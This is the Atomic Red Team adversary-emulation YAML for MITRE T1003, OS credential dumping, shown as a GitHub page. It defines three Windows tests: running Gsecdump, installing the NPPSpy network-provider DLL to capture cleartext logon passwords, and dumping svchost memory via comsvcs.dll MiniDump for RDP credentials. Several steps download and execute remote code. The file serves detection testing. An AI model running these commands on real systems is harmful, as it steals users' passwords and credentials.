MrOrOneEquals1
e0f2a76114
* Update T1003.yaml Add -UseBasicParsing to line 41 * Update T1003.yaml Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
108 lines
5.7 KiB
YAML
108 lines
5.7 KiB
YAML
attack_technique: T1003
|
|
display_name: OS Credential Dumping
|
|
atomic_tests:
|
|
|
|
- name: Gsecdump
|
|
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
|
|
description: |
|
|
Dump credentials from memory using Gsecdump.
|
|
|
|
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
|
|
|
|
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
|
|
You will receive only error output if you do not run this test from an elevated context (run as administrator)
|
|
|
|
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
gsecdump_exe:
|
|
description: Path to the Gsecdump executable
|
|
type: Path
|
|
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
|
|
gsecdump_bin_hash:
|
|
description: File hash of the Gsecdump binary file
|
|
type: String
|
|
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
|
|
gsecdump_url:
|
|
description: Path to download Gsecdump binary file
|
|
type: Url
|
|
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
|
|
prereq_command: |
|
|
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
|
|
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
|
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
|
|
Move-Item $binpath "#{gsecdump_exe}"
|
|
}
|
|
executor:
|
|
command: |
|
|
#{gsecdump_exe} -a
|
|
name: command_prompt
|
|
elevation_required: true
|
|
|
|
- name: Credential Dumping with NPPSpy
|
|
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
|
|
description: |-
|
|
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
|
|
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
|
|
Clean up deletes the files and reverses Registry changes.
|
|
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: NPPSpy.dll must be available in local temp directory
|
|
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
|
|
get_prereq_command: |-
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
|
|
executor:
|
|
command: |-
|
|
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
|
|
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
|
|
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
|
|
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
|
|
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
|
|
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
|
|
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
|
|
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
|
|
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
|
|
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
|
|
cleanup_command: |-
|
|
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
|
|
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
|
|
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
|
|
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
|
|
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
|
|
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
|
|
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
|
|
name: powershell
|
|
elevation_required: true
|
|
|
|
- name: Dump svchost.exe to gather RDP credentials
|
|
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
|
|
description: |
|
|
The svchost.exe contains the RDP plain-text credentials.
|
|
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
|
|
|
|
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
|
|
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
|
|
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
|
|
cleanup_command: |
|
|
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
|
|
name: powershell
|
|
elevation_required: true
|
|
|